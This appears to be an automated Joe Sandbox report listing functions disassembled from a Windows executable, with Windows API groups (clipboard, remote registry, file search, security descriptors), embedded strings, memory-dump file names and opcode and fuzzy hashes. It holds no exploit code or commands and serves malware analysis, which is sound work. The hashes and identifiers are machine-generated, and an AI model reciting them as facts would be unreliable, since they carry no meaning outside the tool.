                                                                                          Function 00007FF74D0C0A6C Relevance: 30.2, APIs: 20, Instructions: 169clipboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                          • String ID:
                                                                                          • API String ID: 3222323430-0
                                                                                          • Opcode ID: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                                          • Instruction ID: d9b6a3bcd98988d252ef06067aabd8714aa41e5dfe6f3771fb4b26713d42268f
                                                                                          • Opcode Fuzzy Hash: 9b87d7956825108095e474127530b25728a3743fc17a6d5c8f31ecbd5b711407
                                                                                          • Instruction Fuzzy Hash: 3D711B22B0DA46C2EA14BB55D9583BCA361BF88B84FC44435D98E476B1FF6CE606C760
                                                                                          Function 00007FF74D0DC6D4 Relevance: 28.9, APIs: 19, Instructions: 396windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                                          • String ID:
                                                                                          • API String ID: 1015379403-0
                                                                                          • Opcode ID: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                                                          • Instruction ID: e00732925c00fddfa4d8e65703fe11bcad20b24bcebf895005057118d4aa94ca
                                                                                          • Opcode Fuzzy Hash: 811f6ddedc4938916125b3772b32f534d797e58df8d8128b9f335a51bc1c3411
                                                                                          • Instruction Fuzzy Hash: 9802D731A0C686C5EB20BF2194186BDA761FF88794F944632DAED07AE4EF3CE541C724
                                                                                          Function 00007FF74D0C206C Relevance: 27.1, APIs: 18, Instructions: 125COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                                          • String ID:
                                                                                          • API String ID: 3215588206-0
                                                                                          • Opcode ID: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                          • Instruction ID: bf3030d55833d54411bab767e51b711bc77cd748a3633fc4abf5de8e06c16512
                                                                                          • Opcode Fuzzy Hash: 486734a10a8987c1c87853d7cfea6df4eeb43b8f453fb3bc83844081bd685034
                                                                                          • Instruction Fuzzy Hash: F7513A32A0CB02CAEB4CEB64E45C27D73A1EB49744F544839DA8E83BA4EE7CE4558354
                                                                                          Function 00007FF74D0D0AEC Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 388registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseValue$ConnectCreateRegistry
                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                          • API String ID: 3314541760-966354055
                                                                                          • Opcode ID: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
                                                                                          • Instruction ID: 9fdda5010731194d6a13e42ac936adfcfe34c783b8994b0a5043ca07ca04d278
                                                                                          • Opcode Fuzzy Hash: 8da99fa8f9cfa95644d42f55175067c4e32022aa9dc53b987727f765eeff7340
                                                                                          • Instruction Fuzzy Hash: DE026326B0CA42C6EB10FF26D4512ADB764FB88F84B859432DE8D47766EF38E445C760
                                                                                          Function 00007FF74D035F3C Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: P
                                                                                          • API String ID: 0-3110715001
                                                                                          • Opcode ID: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                                          • Instruction ID: 7c3e962629307936ba5ad14b986d84bedb048b572a8d2f5bc5570124538c4219
                                                                                          • Opcode Fuzzy Hash: 89df1471032732431b81a05b11aefcbbc91b985f9c802d2c82d041fa720837f2
                                                                                          • Instruction Fuzzy Hash: 74A17F32A0C641CAE724FF26D4586BAF760FB84788F948135DA9E07AA4EF7CE545C710
                                                                                          Function 00007FF74D072400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 366timeCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                                          • String ID: -$:$:$?
                                                                                          • API String ID: 3440502458-92861585
                                                                                          • Opcode ID: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                                          • Instruction ID: a3739b79456a53945962a544e8477e52f4a1b74680c6e68f449bb9a9d2c40395
                                                                                          • Opcode Fuzzy Hash: 2484a17d68417765dfea95e8ed30be907b8393143ee9075556b7ff4147a9153c
                                                                                          • Instruction Fuzzy Hash: 7DE1D572A0C282C6E764FF35A8506B9AB91FF84784FC45135EA8D4BAA5EF3CD4418720
                                                                                          Function 00007FF74D0B72A8 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 284timefileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                          • API String ID: 3232708057-3289030164
                                                                                          • Opcode ID: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                          • Instruction ID: 1a3f0baa5caa0b698dcb21b97b372be2fc590a18272263bcd3f20b146d2cd4bc
                                                                                          • Opcode Fuzzy Hash: 5c779f221d7aeb540d444412295e12a250afa50e4e6d56f81e5e2491da9cccd3
                                                                                          • Instruction Fuzzy Hash: 18D18122B1CA52C6EB10FB65D4551FDA761FB84B94FC00132EA8D47AB9EF78D508C720
                                                                                          Function 00007FF74D0BA350 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 112fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                          • String ID: *.*
                                                                                          • API String ID: 1409584000-438819550
                                                                                          • Opcode ID: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                                          • Instruction ID: 72ce09ea0d1a7fb210132dc916f0734ca40b557979ddc37c1f60f4c311d93d53
                                                                                          • Opcode Fuzzy Hash: 8f313655dcbdbe42a35da08493f07892190d387efc47daab254f64e3a089ff94
                                                                                          • Instruction Fuzzy Hash: C4413C21A0C646D4EA00FB65E8483B9A3A1FB84BA4FC45531DDAE436B4EF7CD40AC720
                                                                                          Function 00007FF74D0AD87C Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 66COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: SendString
                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                          • API String ID: 890592661-1007645807
                                                                                          • Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                          • Instruction ID: 12d11f5e93ee2aa868b1d5cc593358024b4cafbf75b570c235a21e7db83cccdd
                                                                                          • Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                          • Instruction Fuzzy Hash: 90214F22A1C553D2E720FB25F85476AE330BBA8748FD14131E98D43DA8FEACD509CB60
                                                                                          Function 00007FF74D0BA4F8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                          • String ID: *.*
                                                                                          • API String ID: 2640511053-438819550
                                                                                          • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                                          • Instruction ID: 3f3144eb672572fa1983679f9a470dd15cd748145012eb5df69ac3233f8d10dc
                                                                                          • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                                          • Instruction Fuzzy Hash: 4441AB21A0CA46D4EA00BB55A8487BAA391EB45BE4FC05535DDEE03AF5FF7CD40AC720
                                                                                          Function 00007FF74D0B3E20 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                          • String ID: :$\$\??\%s
                                                                                          • API String ID: 3827137101-3457252023
                                                                                          • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                          • Instruction ID: 6164cf0447a8bb79fb4ef251e8ef636b2853c6f0e97d4b965184d5470eb7b604
                                                                                          • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                                          • Instruction Fuzzy Hash: EE41632161C683C5E720BF61E8046FDA3A0FF85798F940136DA9D57AA8EF7CD546C710
                                                                                          Function 00007FF74D0D055C Relevance: 16.9, APIs: 11, Instructions: 371registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                                          • String ID:
                                                                                          • API String ID: 3218304859-0
                                                                                          • Opcode ID: 56613195d31d9b8dc67beba3ae71979573c24aebd7d9093bc0b17d223b1a2dd4
                                                                                          • Instruction ID: bd61385ec2fe9324de0f308f031404fb94e092b9248101cb658be874310c26ca
                                                                                          • Opcode Fuzzy Hash: 56613195d31d9b8dc67beba3ae71979573c24aebd7d9093bc0b17d223b1a2dd4
                                                                                          • Instruction Fuzzy Hash: 24F18332B0DA42C6EB10FF65E5906ACB770EB89B94B818532DE9D47B65EF38E001C754
                                                                                          Function 00007FF74D0B83D4 Relevance: 16.8, APIs: 11, Instructions: 255comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                          • String ID:
                                                                                          • API String ID: 2762341140-0
                                                                                          • Opcode ID: 3f2bc404d53d5998161f0ee2b8df4f9bc3160e202cb50a098f9587f0d2c0f7e1
                                                                                          • Instruction ID: d422dc6c2454377654325c5098937abb31e185b9f1694f5cea559a473e2fd41c
                                                                                          • Opcode Fuzzy Hash: 3f2bc404d53d5998161f0ee2b8df4f9bc3160e202cb50a098f9587f0d2c0f7e1
                                                                                          • Instruction Fuzzy Hash: 66C1492660CB85C6EB10FF66E8842ADA760FB88B94F854036DE8E47775EF78D445C710
                                                                                          Function 00007FF74D09C5FC Relevance: 16.7, APIs: 11, Instructions: 166COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                          • String ID:
                                                                                          • API String ID: 1255039815-0
                                                                                          • Opcode ID: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                                          • Instruction ID: f4e6c24c4b816b00f3e8f0d492447b0fcafb480a1c84e58247850d028d47c400
                                                                                          • Opcode Fuzzy Hash: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                                          • Instruction Fuzzy Hash: B261B062F0C651C6EB10FF61C8446AD77B5FB89B88B844435DE89537A8EF38D546C360
                                                                                          Function 00007FF74D0B59D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                          • API String ID: 4194297153-14809454
                                                                                          • Opcode ID: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                                          • Instruction ID: 4bed860fc6712e52731461b724cfc2c78a12e851e90eeffe3a5eb3e83754b127
                                                                                          • Opcode Fuzzy Hash: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                                          • Instruction Fuzzy Hash: 71416032A0CA46D5EB10BB65D4882BCA771FB88B94F954432CA8D13BA5FF78D585C320
                                                                                          Function 00007FF74D0C6C34 Relevance: 15.3, APIs: 10, Instructions: 296fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                          • String ID:
                                                                                          • API String ID: 2395222682-0
                                                                                          • Opcode ID: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                                          • Instruction ID: 6dfd31b40ed6ee5a59e04bc97607667533812eb15960362e0a2c01f3945c3e03
                                                                                          • Opcode Fuzzy Hash: 392a36257488f8891aba19e7c901252a1c57c9e7be585a14d68986620d9dc28e
                                                                                          • Instruction Fuzzy Hash: 70D13936B0CB46C6EB24BB65D4442ADA3A1FB98F88B904436DE8D57B74EF38D445C360
                                                                                          Function 00007FF74D0DA59C Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$LongWindow
                                                                                          • String ID:
                                                                                          • API String ID: 312131281-0
                                                                                          • Opcode ID: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
